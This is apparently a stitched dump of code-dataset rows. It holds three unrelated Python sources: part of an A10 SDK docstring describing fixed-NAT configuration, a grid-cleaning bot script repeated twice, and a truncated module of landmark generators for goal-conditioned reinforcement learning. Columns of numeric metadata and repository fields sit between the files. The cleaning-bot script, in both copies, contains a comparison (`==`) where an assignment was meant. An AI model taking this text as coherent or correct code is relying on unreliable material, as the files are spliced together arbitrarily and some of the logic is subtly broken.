:param iplist_list: {"minItems": 1, "items": {"type": "iplist"}, "uniqueItems": true, "array": [{"required": ["inside-ip-list", "partition"], "properties": {"ports-per-user": {"description": "Configure Ports per Inside User (ports-per-user)", "format": "number", "type": "number", "maximum": 64512, "minimum": 1, "optional": true}, "vrid": {"description": "VRRP-A vrid (Specify ha VRRP-A vrid)", "format": "number", "type": "number", "maximum": 31, "minimum": 1, "optional": true}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "nat-end-address": {"optional": true, "type": "string", "description": "IPv4 End NAT Address", "format": "ipv4-address"}, "partition": {"description": "Inside User Partition (Partition Name)", "partition-visibility": "shared", "minLength": 1, "format": "string", "optional": false, "maxLength": 63, "type": "string"}, "nat-netmask": {"optional": true, "type": "string", "description": "NAT Addresses IP Netmask", "format": "ipv4-netmask"}, "inside-ip-list": {"description": "Name of IP List used to specify Inside Users", "format": "string-rlx", "minLength": 1, "optional": false, "maxLength": 63, "type": "string"}, "session-quota": {"description": "Configure per user quota on sessions", "format": "number", "type": "number", "maximum": 2147483647, "minimum": 1, "optional": true}, "usable-nat-ports": {"type": "object", "properties": {"usable-start-port": {"description": "Start Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}, "usable-end-port": {"description": "End Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}}}, "nat-start-address": {"optional": true, "type": "string", "description": "Start NAT Address", "format": "ipv4-address"}, "nat-ip-list": {"description": "Name of IP List used to specify NAT addresses", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "offset": {"type": "object", "properties": {"numeric-offset": {"description": "Configure a numeric offset to the first NAT IP address", "format": "number", "default": 0, "maximum": 1024000, "minimum": 0, "not": "random", "type": "number"}, "random": {"default": 0, "not": "numeric-offset", "type": "number", "description": "Randomly choose the first NAT IP address", "format": "flag"}}}, "respond-to-user-mac": {"default": 0, "optional": true, "type": "number", "description": "Use the user's source MAC for the next hop rather than the routing table (Default: off)", "format": "flag"}, "method": {"description": "'use-all-nat-ips': Use all the NAT IP addresses configured; 'use-least-nat-ips': Use the least number of NAT IP addresses required (default); ", "format": "enum", "default": "use-least-nat-ips", "type": "string", "enum": ["use-all-nat-ips", "use-least-nat-ips"], "optional": true}, "dest-rule-list": {"description": "Bind destination based Rule-List (Fixed NAT Rule-List Name)", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "dynamic-pool-size": {"description": "Configure size of Dynamic pool (Default: 0)", "format": "number", "default": 0, "optional": true, "maximum": 64511, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/cgnv6/fixed-nat/inside/iplist/{inside-ip-list}+{partition}"}
:param ipv4address_list: {"minItems": 1, "items": {"type": "ipv4address"}, "uniqueItems": true, "array": [{"required": ["inside-start-address", "inside-end-address", "inside-netmask", "partition"], "properties": {"ports-per-user": {"description": "Configure Ports per Inside User (ports-per-user)", "format": "number", "type": "number", "maximum": 64512, "minimum": 1, "optional": true}, "vrid": {"description": "VRRP-A vrid (Specify ha VRRP-A vrid)", "format": "number", "type": "number", "maximum": 31, "minimum": 1, "optional": true}, "inside-netmask": {"optional": false, "type": "string", "description": "IPv4 Netmask", "format": "ipv4-netmask-brief"}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "nat-end-address": {"optional": true, "type": "string", "description": "IPv4 End NAT Address", "format": "ipv4-address"}, "usable-nat-ports": {"type": "object", "properties": {"usable-start-port": {"description": "Start Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}, "usable-end-port": {"description": "End Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}}}, "partition": {"description": "Inside User Partition (Partition Name)", "partition-visibility": "shared", "minLength": 1, "format": "string", "optional": false, "maxLength": 63, "type": "string"}, "nat-netmask": {"optional": true, "type": "string", "description": "NAT Addresses IP Netmask", "format": "ipv4-netmask-brief"}, "session-quota": {"description": "Configure per user quota on sessions", "format": "number", "type": "number", "maximum": 2147483647, "minimum": 1, "optional": true}, "method": {"description": "'use-all-nat-ips': Use all the NAT IP addresses configured; 'use-least-nat-ips': Use the least number of NAT IP addresses required (default); ", "format": "enum", "default": "use-least-nat-ips", "type": "string", "enum": ["use-all-nat-ips", "use-least-nat-ips"], "optional": true}, "inside-start-address": {"optional": false, "type": "string", "description": "IPv4 Inside User Start Address", "format": "ipv4-address"}, "nat-start-address": {"optional": true, "type": "string", "description": "Start NAT Address", "format": "ipv4-address"}, "nat-ip-list": {"description": "Name of IP List used to specify NAT addresses", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "offset": {"type": "object", "properties": {"numeric-offset": {"description": "Configure a numeric offset to the first NAT IP address", "format": "number", "default": 0, "maximum": 1024000, "minimum": 0, "not": "random", "type": "number"}, "random": {"default": 0, "not": "numeric-offset", "type": "number", "description": "Randomly choose the first NAT IP address", "format": "flag"}}}, "respond-to-user-mac": {"default": 0, "optional": true, "type": "number", "description": "Use the user's source MAC for the next hop rather than the routing table (Default: off)", "format": "flag"}, "inside-end-address": {"optional": false, "type": "string", "description": "IPv4 Inside User End Address", "format": "ipv4-address"}, "dest-rule-list": {"description": "Bind destination based Rule-List (Fixed NAT Rule-List Name)", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "dynamic-pool-size": {"description": "Configure size of Dynamic pool (Default: 0)", "format": "number", "default": 0, "optional": true, "maximum": 64511, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/cgnv6/fixed-nat/inside/ipv4address/{inside-start-address}+{inside-end-address}+{inside-netmask}+{partition}"}
:param ipv6address_list: {"minItems": 1, "items": {"type": "ipv6address"}, "uniqueItems": true, "array": [{"required": ["inside-start-address", "inside-end-address", "inside-netmask", "partition"], "properties": {"ports-per-user": {"description": "Configure Ports per Inside User (ports-per-user)", "format": "number", "type": "number", "maximum": 64512, "minimum": 1, "optional": true}, "vrid": {"description": "VRRP-A vrid (Specify ha VRRP-A vrid)", "format": "number", "type": "number", "maximum": 31, "minimum": 1, "optional": true}, "inside-netmask": {"description": "Inside User IPv6 Netmask", "format": "number", "type": "number", "maximum": 128, "minimum": 64, "optional": false}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "nat-end-address": {"optional": true, "type": "string", "description": "IPv6 End NAT Address", "format": "ipv4-address"}, "usable-nat-ports": {"type": "object", "properties": {"usable-start-port": {"description": "Start Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}, "usable-end-port": {"description": "End Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}}}, "partition": {"description": "Inside User Partition (Partition Name)", "partition-visibility": "shared", "minLength": 1, "format": "string", "optional": false, "maxLength": 63, "type": "string"}, "nat-netmask": {"optional": true, "type": "string", "description": "NAT Addresses IP Netmask", "format": "ipv4-netmask-brief"}, "session-quota": {"description": "Configure per user quota on sessions", "format": "number", "type": "number", "maximum": 2147483647, "minimum": 1, "optional": true}, "method": {"description": "'use-all-nat-ips': Use all the NAT IP addresses configured; 'use-least-nat-ips': Use the least number of NAT IP addresses required (default); ", "format": "enum", "default": "use-least-nat-ips", "type": "string", "enum": ["use-all-nat-ips", "use-least-nat-ips"], "optional": true}, "inside-start-address": {"optional": false, "type": "string", "description": "IPv6 Inside User Start Address", "format": "ipv6-address"}, "nat-start-address": {"optional": true, "type": "string", "description": "Start NAT Address", "format": "ipv4-address"}, "nat-ip-list": {"description": "Name of IP List used to specify NAT addresses", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "offset": {"type": "object", "properties": {"numeric-offset": {"description": "Configure a numeric offset to the first NAT IP address", "format": "number", "default": 0, "maximum": 1024000, "minimum": 0, "not": "random", "type": "number"}, "random": {"default": 0, "not": "numeric-offset", "type": "number", "description": "Randomly choose the first NAT IP address", "format": "flag"}}}, "respond-to-user-mac": {"default": 0, "optional": true, "type": "number", "description": "Use the user's source MAC for the next hop rather than the routing table (Default: off)", "format": "flag"}, "inside-end-address": {"optional": false, "type": "string", "description": "IPv6 Inside User End Address", "format": "ipv6-address"}, "dest-rule-list": {"description": "Bind destination based Rule-List (Fixed NAT Rule-List Name)", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "dynamic-pool-size": {"description": "Configure size of Dynamic pool (Default: 0)", "format": "number", "default": 0, "optional": true, "maximum": 64511, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/cgnv6/fixed-nat/inside/ipv6address/{inside-start-address}+{inside-end-address}+{inside-netmask}+{partition}"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/cgnv6/fixed-nat/inside`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "inside"
self.a10_url="/axapi/v3/cgnv6/fixed-nat/inside"
self.DeviceProxy = ""
self.iplist_list = []
self.ipv4address_list = []
self.ipv6address_list = []
for keys, value in kwargs.items():
setattr(self, keys, value)
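# Hedged usage sketch (illustrative, not from the a10sdk sources):
# instantiating the wrapper with a hypothetical DeviceProxy and appending
# an iplist entry whose keys follow the schema in the class docstring.
#
#     inside = Inside(DeviceProxy=device_proxy)
#     inside.iplist_list.append(
#         {'inside-ip-list': 'users', 'partition': 'shared'})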
| 297.7
| 3,794
| 0.658885
| 1,484
| 11,908
| 5.277628
| 0.103774
| 0.055158
| 0.029877
| 0.02809
| 0.908069
| 0.878703
| 0.859678
| 0.859678
| 0.859678
| 0.852528
| 0
| 0.026038
| 0.116308
| 11,908
| 39
| 3,795
| 305.333333
| 0.718236
| 0.954484
| 0
| 0
| 0
| 0
| 0.079665
| 0.067086
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.076923
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce46596d3a133d297d8a17b580c6fc6447b58d97
| 3,146
|
py
|
Python
|
CleaningBot_newcode.py
|
crazybiceps/Cleaning-Bot
|
c34606d12c74cdca026b6aa1b1f30f275cd49730
|
[
"Apache-2.0"
] | null | null | null |
CleaningBot_newcode.py
|
crazybiceps/Cleaning-Bot
|
c34606d12c74cdca026b6aa1b1f30f275cd49730
|
[
"Apache-2.0"
] | null | null | null |
CleaningBot_newcode.py
|
crazybiceps/Cleaning-Bot
|
c34606d12c74cdca026b6aa1b1f30f275cd49730
|
[
"Apache-2.0"
] | null | null | null |
# Head ends here
def next_move(posr, posc, board):
p = 0
q = 0
dmin = 0
dmax = 0
position = 0
for i in range(5) :
count = 0
for j in range(5) :
if board[i][j] == "d" :
count += 1
if count == 1 :
dmax = dmin = j
elif count > 1 :
dmax = j
if count > 0 :
for l in range(dmin , dmax + 1):
if position < dmin :
for k in range(position , dmin , 1) :
print("RIGHT")
position = k + 1
elif position > dmin :
for k in range(position , dmin , -1) :
if board[i][k] == "d" :
print("CLEAN")
board[i][k] == "-"
print("LEFT")
position = k - 1
elif position == dmin :
print("CLEAN")
board[i][dmin] = "-"
if dmin != dmax :
position += 1
print("RIGHT")
if i != 4 :
print("DOWN")
# Tail starts here
if __name__ == "__main__":
pos = [int(i) for i in input().strip().split()]
board = [[j for j in input().strip()] for i in range(5)]
next_move(pos[0], pos[1], board)
# Slight changes from the version above: the elif branches become independent ifs, so the bot can move right and then clean in the same row pass
# Head ends here
def next_move(posr, posc, board):
p = 0
q = 0
dmin = 0
dmax = 0
position = 0
for i in range(5) :
count = 0
for j in range(5) :
if board[i][j] == "d" :
count += 1
if count == 1 :
dmax = dmin = j
elif count > 1 :
dmax = j
if count > 0 :
for l in range(dmin , dmax + 1):
if position < dmin :
for k in range(position , dmin , 1) :
print("RIGHT")
position = k + 1
if position > dmin :
for k in range(position , dmin , -1) :
if board[i][k] == "d" :
print("CLEAN")
board[i][k] == "-"
print("LEFT")
position = k - 1
if position == dmin :
print("CLEAN")
board[i][dmin] = "-"
if dmin != dmax :
position += 1
print("RIGHT")
if i != 4 :
print("DOWN")
# Tail starts here
if __name__ == "__main__":
pos = [int(i) for i in input().strip().split()]
board = [[j for j in input().strip()] for i in range(5)]
next_move(pos[0], pos[1], board)
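# Hedged sample run (traced against the second version above): with the
# bot at (0, 0) and one dirty cell at (0, 2), the row scan prints RIGHT,
# RIGHT, CLEAN, then DOWN after each of the first four rows. Example stdin:
#
#     0 0
#     b-d--
#     -----
#     -----
#     -----
#     -----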
| 27.840708
| 60
| 0.327718
| 312
| 3,146
| 3.240385
| 0.153846
| 0.083086
| 0.035608
| 0.043521
| 0.973294
| 0.973294
| 0.963403
| 0.963403
| 0.963403
| 0.963403
| 0
| 0.032401
| 0.568341
| 3,146
| 112
| 61
| 28.089286
| 0.712077
| 0.030515
| 0
| 0.95
| 0
| 0
| 0.02629
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| false
| 0
| 0
| 0
| 0.025
| 0.15
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ce7d8511ca46810e745188dd99bc57f1ce317c91
| 49,357
|
py
|
Python
|
stable_baselines/common/landmark_generator.py
|
spitis/stable-baselines
|
f62cd6698b2427c0fb5ac452b9059a59b22cde81
|
[
"MIT"
] | null | null | null |
stable_baselines/common/landmark_generator.py
|
spitis/stable-baselines
|
f62cd6698b2427c0fb5ac452b9059a59b22cde81
|
[
"MIT"
] | 2
|
2018-11-14T22:53:17.000Z
|
2018-11-15T00:06:40.000Z
|
stable_baselines/common/landmark_generator.py
|
spitis/stable-baselines
|
f62cd6698b2427c0fb5ac452b9059a59b22cde81
|
[
"MIT"
] | null | null | null |
import numpy as np, tensorflow as tf, os, cloudpickle
import tensorflow_probability as tfp
from stable_baselines.common.replay_buffer import ReplayBuffer
from stable_baselines.common import tf_util
from abc import ABC, abstractmethod
import faiss
class AbstractLandmarkGenerator(ABC):
"""
Defines interface for landmark generators
"""
def __init__(self, buffer_size, env, _init_setup_model=True):
self.buffer_size = buffer_size
self.env = env
self.ac_space = self.env.action_space
self.ob_space = self.env.observation_space.spaces['observation']
self.goal_space = self.env.observation_space.spaces['achieved_goal']
if not self.env.goal_extraction_function:
raise ValueError("Environment must have goal_extraction_function method")
self.goal_extraction_function = self.env.goal_extraction_function
self.states = None
self.landmark_states = None
self.goals = None
self.use_actions = False
self.actions = None
self.sess = None
self.index = None
def _setup_model(self):
pass
@abstractmethod
def add_state_data(self, states, achieved_goals):
"""
Processes state / achieved_goal data.
"""
raise NotImplementedError
@abstractmethod
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional):
"""
Processes state / action / landmark / goal data.
"""
raise NotImplementedError
@abstractmethod
def generate(self, states, actions, goals):
"""Generates landmarks for states and goals (and optionally, actions).
:param states: (batch_size * state_dim vector)
:param states: (batch_size * action_dim vector)
:param goals: (batch_size * goal_dim vector)
:return landmarks: (tuple of (landmark_states, landmark_goals))
"""
raise NotImplementedError
@abstractmethod
def assign_scores(self, scores, ratios):
"""Assigns scores to the landmarks previously generated by generate method."""
raise NotImplementedError
@staticmethod
def _save_to_file(save_path, data=None, params=None):
_, ext = os.path.splitext(save_path)
if ext == "":
save_path += ".pkl"
with open(save_path, "wb") as file:
cloudpickle.dump((data, params), file)
@staticmethod
def _load_from_file(load_path):
if not os.path.exists(load_path):
if os.path.exists(load_path + ".pkl"):
load_path += ".pkl"
else:
raise ValueError(
"Error: the file {} could not be found".format(load_path))
with open(load_path, "rb") as file:
data, params = cloudpickle.load(file)
return data, params
@abstractmethod
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
# self._save_to_file(save_path, data={}, params=None)
raise NotImplementedError()
@classmethod
def load(cls, load_path, env=None, **kwargs):
data, params = cls._load_from_file(load_path)
model = cls(buffer_size=data["buffer_size"], env=data['env'], _init_setup_model=False)
model.__dict__.update(data)
model.__dict__.update(kwargs)
model._setup_model()
if model.sess is not None:
restores = []
for param, loaded_p in zip(model.params, params):
restores.append(param.assign(loaded_p))
model.sess.run(restores)
if model.index is not None:
index_filename = load_path + '.faiss_idx'
model.index = faiss.read_index(index_filename)
return model
class RandomLandmarkGenerator(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=True)
self.state_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape)])
if self.goal_extraction_function is None:
raise ValueError("Random generator requires a goal_extraction function!")
def add_state_data(self, states, goals):
self.state_buffer.add_batch(states)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional=None):
# Does nothing with landmark experiences
pass
def generate(self, states, actions, goals):
# Does not use actions
self.landmark_states = landmark_states = self.state_buffer.sample(len(states))[0]
landmark_goals = self.goal_extraction_function(landmark_states)
self.states = states
self.actions = actions
self.goals = goals
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (random generator does not learn)
pass
def __len__(self):
return len(self.state_buffer)
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
# self._save_to_file(save_path, data={}, params=None)
data = {
"state_buffer": self.state_buffer,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"env": self.env
}
self._save_to_file(save_path, data=data, params=None)
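# Hedged usage sketch (illustrative): the random generator samples
# previously seen states as landmarks and derives their goals via the
# env's goal_extraction_function. `env`, `states`, `actions`, `goals` and
# `achieved_goals` are placeholders for a goal-conditioned setup.
#
#     gen = RandomLandmarkGenerator(buffer_size=100000, env=env)
#     gen.add_state_data(states, achieved_goals)
#     lm_states, lm_goals = gen.generate(states, actions, goals)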
class NearestNeighborLandmarkGenerator(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, epsilon=0.3, time_scale=0.000001, score_cutoff=0.96, threshold_nn_size=1000, max_size=200000, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=True)
self.state_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape)])
self.landmark_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape),
("action", self.ac_space.shape),
("landmark", self.ob_space.shape),
("desired_goal", self.goal_space.shape)
])
self.d = self.ob_space.shape[-1] + self.goal_space.shape[-1] + 1
self.index = faiss.IndexFlatL2(self.d)
self.score_cutoff = score_cutoff
self.time_scale = time_scale
self.epsilon = epsilon
self.threshold_nn_size = threshold_nn_size
self.landmarks = np.zeros((0, self.ob_space.shape[-1]))
self.time = 0.
self.max_size = max_size
if self.goal_extraction_function is None:
raise ValueError("Random generator requires a goal_extraction function!")
def add_state_data(self, states, goals):
self.state_buffer.add_batch(states)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional=None):
self.landmark_buffer.add_batch(states, actions, landmarks, desired_goals)
def generate(self, states, actions, goals):
self.states = states
self.actions = actions
self.goals = goals
nn_size = self.index.ntotal
if nn_size > self.max_size:
# Prune the older half of the NN database. Removing a leading id range from
# faiss shifts the remaining ids down, so the landmark array is truncated in
# lockstep to keep positions aligned.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_size // 2))
self.landmarks = self.landmarks[self.max_size // 2:]
nn_size = self.index.ntotal
assert len(self.landmarks) == nn_size
if nn_size < self.threshold_nn_size:
self.landmark_states = landmark_states = self.state_buffer.sample(len(states))[0]
else:
num_random = int(self.epsilon * len(states))
random_landmarks = self.state_buffer.sample(num_random)[0]
time_feature = np.ones((len(states)-num_random,1)) * self.time
query = np.concatenate([states[num_random:], goals[num_random:], time_feature], 1).astype('float32')
_, lidxs = self.index.search(query, 1)
genned_landmarks = self.landmarks[lidxs[:,0]]
self.landmark_states = landmark_states = np.concatenate((random_landmarks, genned_landmarks), 0)
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Store well-scored (state, goal, time) contexts and their landmarks in the
# NN index; this is how the nearest-neighbor generator learns.
self.time += self.time_scale
time_feature = np.ones((len(self.states),1)) * self.time
values = np.concatenate((self.states, self.goals, time_feature), 1)
saved_idxs = np.squeeze(np.argwhere(scores > self.score_cutoff),1)
saved_values = values[saved_idxs]
saved_landmarks = self.landmark_states[saved_idxs]
self.index.add(saved_values.astype('float32'))
self.landmarks = np.concatenate((self.landmarks, saved_landmarks), 0)
def __len__(self):
return self.index.ntotal
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
data = {
"state_buffer": self.state_buffer,
"landmark_buffer": self.landmark_buffer,
"d": self.d,
"score_cutoff": self.score_cutoff,
"time_scale": self.time_scale,
"epsilon": self.epsilon,
"threshold_nn_size": self.threshold_nn_size,
"landmarks": self.landmarks,
"time": self.time,
"max_size": self.max_size,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"env": self.env
}
index_filename = save_path + '.faiss_idx'
faiss.write_index(self.index, index_filename)
self._save_to_file(save_path, data=data, params=None)
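# Sketch of the query layout used by NearestNeighborLandmarkGenerator.generate:
# each faiss query row is [state || goal || time], matching the index dimension
# d = |obs| + |goal| + 1 set in __init__. Shapes below are hypothetical; the
# body mirrors the code above.
def _example_nn_query(states, goals, time):
    time_feature = np.ones((len(states), 1)) * time
    return np.concatenate([states, goals, time_feature], 1).astype('float32')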
class NonScoreBasedVAEWithNNRefinement(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, refine_with_NN=False, use_actions=True, batch_size=128, num_training_steps=100, learning_threshold=100, max_nn_index_size=200000, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=_init_setup_model)
self.refine_with_NN = refine_with_NN
self.use_actions = use_actions
self.hidden_dim = 400
self.z_dim = 50
self.batch_size = batch_size
self.num_training_steps = num_training_steps
self.learning_threshold = learning_threshold
self.max_nn_index_size = max_nn_index_size
if self.goal_extraction_function is None:
raise ValueError("NonScoreBasedVAEWithNNRefinement requires a goal_extraction function!")
self.steps = 0
## Replay Buffers ##
self.landmarks = np.zeros((0, self.ob_space.shape[-1]))
self.landmark_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape),
("action", self.ac_space.shape),
("landmark", self.ob_space.shape),
("desired_goal", self.goal_space.shape)
])
## NN Index ##
self.d = self.ob_space.shape[-1]
self.index = faiss.IndexFlatL2(self.d)
if _init_setup_model:
self._setup_model()
def _setup_model(self):
## CVAE Graph ##
self.graph = tf.Graph()
with self.graph.as_default():
self.sess = tf_util.make_session(graph=self.graph)
with tf.variable_scope("lervae"):
sag_len = self.ob_space.shape[-1] + self.goal_space.shape[-1]
if self.use_actions:
sag_len += self.ac_space.shape[-1]
state_action_goal = tf.placeholder(tf.float32, [None, sag_len], name='sag_placeholder')
landmark = tf.placeholder(tf.float32, [None, self.ob_space.shape[-1]], name='lm_placeholder')
# encoder
h = tf.layers.dense(tf.concat([state_action_goal, landmark], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
mu = tf.layers.dense(h, self.z_dim)
log_variance = tf.layers.dense(h, self.z_dim)
z = tf.random_normal(shape=tf.shape(mu)) * tf.sqrt(tf.exp(log_variance)) + mu
# decoder
h = tf.layers.dense(tf.concat([state_action_goal, z], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
generated_landmark = tf.layers.dense(h, self.ob_space.shape[-1])
# Distortion is the negative log likelihood: P(X|z,c)
l2_loss = tf.reduce_sum(tf.squared_difference(landmark, generated_landmark), 1)
tf.summary.scalar("VAE_distortion_l2Loss", tf.reduce_mean(l2_loss))
# The rate is the D_KL(Q(z|X,y)||P(z|c))
latent_loss = -0.5*tf.reduce_sum(1.0 + log_variance - tf.square(mu) - tf.exp(log_variance), 1)
tf.summary.scalar("VAE_rate_LatentLoss", tf.reduce_mean(latent_loss))
loss = tf.reduce_mean(l2_loss + latent_loss)
tf.summary.scalar("VAE_elbo", loss)
opt = tf.train.AdamOptimizer()
gradients = opt.compute_gradients(loss, var_list=tf.trainable_variables())
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, 1.), var)
ts = opt.apply_gradients(gradients)
init = tf.global_variables_initializer()
self.summary = tf.summary.merge_all()
self.params = tf.global_variables("lervae")
self.sess.run(init)
self.g = {
'sag_ph': state_action_goal,
'lm_ph': landmark,
'z': z,
'generated_landmark': generated_landmark,
'loss': loss,
'ts': ts,
'summary': self.summary
}
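# Note on the objective built above: the CVAE minimizes distortion plus rate,
#   L = E[||landmark - decoder(z, c)||^2] + D_KL(q(z | landmark, c) || N(0, I)),
# with condition c = [state, (action,) goal] and the reparameterized sample
# z = mu + sqrt(exp(log_variance)) * eps, eps ~ N(0, I).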
def add_state_data(self, states, goals):
"""Add state data to buffer (for initial random generation), and also to NN Index"""
self.landmarks = np.concatenate((self.landmarks, states), 0)
self.index.add(states.astype('float32'))
nn_size = self.index.ntotal
if nn_size > self.max_nn_index_size:
#prune half of the nn database
#I verified that this works as intended: when we remove ids from faiss, all ids get bumped up.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_nn_index_size//2))
self.landmarks = self.landmarks[self.max_nn_index_size//2:]
nn_size = self.index.ntotal
assert(len(self.landmarks) == nn_size)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional=None):
self.landmark_buffer.add_batch(states, actions, landmarks, desired_goals)
loss = 0
# run some training steps
for _ in range(self.num_training_steps):
self.steps += 1
s, a, l, g = self.landmark_buffer.sample(self.batch_size)
if self.use_actions:
feed_dict = {self.g['sag_ph']: np.concatenate((s, a, g), axis=1),
self.g['lm_ph']: l}
else:
feed_dict = {self.g['sag_ph']: np.concatenate((s, g), axis=1),
self.g['lm_ph']: l}
_, loss_, summary = self.sess.run([self.g['ts'], self.g['loss'], self.g['summary']], feed_dict=feed_dict)
loss += loss_
if self.steps % 100 == 0:
print("Landmark CVAE step {}: loss {}".format(self.steps, loss / self.num_training_steps))
return summary
def generate(self, states, actions, goals):
self.states = states
self.actions = actions
self.goals = goals
# Generate randomly at first
if self.steps < self.learning_threshold:
# np.random.choice cannot sample rows of a 2-D array directly, so sample
# indices instead (as the image variants below already do).
sample_idx = np.random.choice(len(self.landmarks), size=len(states))
self.landmark_states = landmark_states = self.landmarks[sample_idx]
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
# Otherwise, generate using the VAE
sampled_zs = np.random.normal(size=(len(states), self.z_dim))
if self.use_actions:
feed_dict = {self.g['z']: sampled_zs, self.g['sag_ph']: np.concatenate([states, actions, goals], axis=1)}
else:
feed_dict = {self.g['z']: sampled_zs, self.g['sag_ph']: np.concatenate([states, goals], axis=1)}
landmark_states = self.sess.run(self.g['generated_landmark'], feed_dict=feed_dict)
if self.refine_with_NN:
query = landmark_states.astype('float32')
_, lidxs = self.index.search(query, 1)
landmark_states = self.landmarks[lidxs[:,0]]
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (this is not a score-based generator)
pass
def __len__(self):
return self.index.ntotal
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
data = {
"landmark_buffer": self.landmark_buffer,
"refine_with_NN": self.refine_with_NN,
"use_actions": self.use_actions,
"hidden_dim": self.hidden_dim,
"z_dim": self.z_dim,
"batch_size": self.batch_size,
"num_training_steps": self.num_training_steps,
"learning_threshold": self.learning_threshold,
"max_nn_index_size": self.max_nn_index_size,
"steps": self.steps,
"landmarks": self.landmarks,
"d": self.d,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"buffer_size": self.buffer_size,
"env": self.env
}
index_filename = save_path + '.faiss_idx'
faiss.write_index(self.index, index_filename)
# Model parameters to be restored
params = self.sess.run(self.params)
self._save_to_file(save_path, data=data, params=params)
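# Illustrative end-to-end sketch for the CVAE generator (hypothetical arrays,
# assumed large enough to sample a training batch; the real driver lives in
# this module's callers):
def _example_cvae_generator(env, states, actions, goals, landmarks, desired_goals):
    gen = NonScoreBasedVAEWithNNRefinement(buffer_size=100000, env=env, refine_with_NN=True)
    gen.add_state_data(states, goals)  # seeds the NN index used for refinement
    gen.add_landmark_experience_data(states, actions, landmarks, desired_goals)
    # Random landmarks until `learning_threshold` training steps, then CVAE samples.
    return gen.generate(states, actions, goals)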
class ScoreBasedVAEWithNNRefinement(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, refine_with_NN=False, use_actions=True, batch_size=128, num_training_steps=100, learning_threshold=100, max_nn_index_size=200000, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=_init_setup_model)
self.get_scores_with_experiences = True
self.refine_with_NN = refine_with_NN
self.use_actions = use_actions
